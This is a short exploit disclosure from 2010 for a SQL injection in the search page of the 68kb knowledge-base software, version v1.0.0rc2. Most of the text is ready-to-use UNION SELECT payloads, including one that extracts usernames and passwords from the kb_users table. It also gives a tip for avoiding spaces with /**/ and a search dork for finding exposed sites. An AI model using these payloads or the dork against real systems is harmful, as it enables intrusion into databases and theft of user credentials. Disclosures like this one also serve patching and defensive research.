Exploit Title: 68kb SQLI Date: 2010-03-28 Author: Jelmer de Hen Software Link: http://68kb.googlecode.com/files/68kb-v1.0.0rc2.zip Version: v1.0.0rc2 Go to /search and search for: %')/**/UNION/**/ALL/**/SELECT/**/1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15# Don't use spaces in the injection because they change the sql query in a way which makes the injection nearly impossible; instead use /**/. Here is an example how to select usernames and password if the default prefix of kb_ is used during the installation: search for: %')/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/kb_users# Dork: "Powered by 68kb" -Jelmer de Hen